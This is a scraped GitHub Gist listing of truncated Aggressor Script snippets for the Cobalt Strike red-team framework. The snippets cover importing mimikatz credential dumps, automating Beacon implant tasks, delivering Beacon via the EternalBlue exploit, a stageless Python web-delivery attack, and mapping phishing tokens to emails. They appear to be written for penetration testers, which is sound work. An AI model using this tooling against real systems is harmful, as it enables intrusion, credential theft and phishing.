Skip to content

Instantly share code, notes, and snippets.

Avatar

Raphael Mudge rsmudge

  • Washington, DC
View GitHub Profile
@rsmudge
rsmudge / mkimport.cna
Created Jan 14, 2021
import creds from a file with mimikatz output.
View mkimport.cna
# import mimikatz creds from a file.
# go to View -> Script Console
# load this script
# type importcreds /path/to/file.txt
sub process {
if ($luser eq "(null)" || $luser eq "") {
return;
}
@rsmudge
rsmudge / checkit.cna
Created Sep 18, 2020
Fire a beacon_revisited event when we get a checkin event that occurs some window of time (e.g., 60s here) after the last checkin event. Keep in mind checkin is only fired on task acknowledgement. If you set the window to 8 hours and don't interact with the Beacon for 8 hours--you'll fire revisited.
View checkit.cna
global('%checkins');
on beacon_checkin {
local('$last');
if ($1 in %checkins) {
$last = %checkins[$1];
# has it been 1m since the last task acknowledgement?
if (($3 - $last) > 60000) {
@rsmudge
rsmudge / search.cna
Last active Jun 24, 2021
Search scrollback for a Beacon (even the stuff that's cut off)
View search.cna
# search for and reproduce output that matches a specific regex.
alias search {
local('$regex $regex2 $entry $event $bid $out $when');
# take all of the args, without processing/parsing as normal.
if (strlen($0) > 7) {
$regex = substr($0, 7);
}
else {
berror($1, "search [regex]");
@rsmudge
rsmudge / callany.cna
Last active Jul 21, 2020
Create a hidden Beacon console and pass a command+args to it for execution.
View callany.cna
import aggressor.windows.BeaconConsole;
import java.awt.event.ActionEvent;
# $1 = beacon ID
# $2 = command + args to run [as if you typed it in the console]
sub beacon_input_command {
local('$event');
# we make the console a static var because each console we create subscribes to a bunch of stuff
# and requires a manual step [normally performed by a Window close event] to clean up these things.
@rsmudge
rsmudge / initial.cna
Created Feb 20, 2019
How to automate Beacon to execute a sequence of tasks with each checkin...
View initial.cna
#
# Demonstrate how to queue tasks to execute with each checkin...
#
#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
#
sub stuffToDo {
# Tasks for first checkin
@rsmudge
rsmudge / mouse.cna
Created Mar 21, 2018
How to add a popup handler to a Swing component in Aggressor Script/Sleep
View mouse.cna
# demonstrate how to add a popup handler to a Swing component in Sleep
import java.awt.*;
import javax.swing.*;
import javax.swing.event.*;
# safely add a listener to show a popup
sub setupPopupMenu {
# we're using fork({}) to run this in a separate Aggressor Script environment.
@rsmudge
rsmudge / safedelete.cna
Created Sep 1, 2017
Override default file browser popup in Cobalt Strike to prompt user when they try to delete a file.
View safedelete.cna
#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");
popup filebrowser {
item "&Download" {
local('$file');
foreach $file ($3) {
bdownload($1, "$2 $+ \\ $+ $file");
@rsmudge
rsmudge / eternalblue.cna
Last active Aug 26, 2021
Script to deliver Cobalt Strike's Beacon payload with the Metasploit Framework's exploit/windows/smb/ms17_010_eternalblue exploit.
View eternalblue.cna
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#
# target, listener, where to save .rc file
sub generate_rc_file {
local('$target $listener $where $handle $shellcode');
($target, $listener, $where) = @_;
@rsmudge
rsmudge / stagelesspython.cna
Created Apr 26, 2017
Stageless Python Web Delivery attack. Kind of fun. I did cheat and use an internal API. :)
View stagelesspython.cna
# Python Stageless Scripted Web Delivery
# setup our stageless Python Web Delivery attack
sub setup_attack {
local('%options $x86payload $x64payload $url $script');
%options = $3;
# generate our stageless x86 payload
artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
yield;
@rsmudge
rsmudge / tokenToEmail.cna
Created Mar 31, 2017
This script demonstrates how to change Cobalt Strike's WEB_HIT and PROFILER_HIT hooks to resolve a phishing token to an email address.
View tokenToEmail.cna
#
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
#
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
#
# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
local('$out $now $method $uri $addr $ua $response $size $handler $when $params');